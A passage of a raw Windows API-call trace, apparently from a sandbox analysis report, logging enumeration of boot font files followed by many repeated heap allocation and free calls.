ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.805] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0200.805] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0200.805] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0200.805] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0200.805] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0200.805] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0200.805] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.805] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.812] 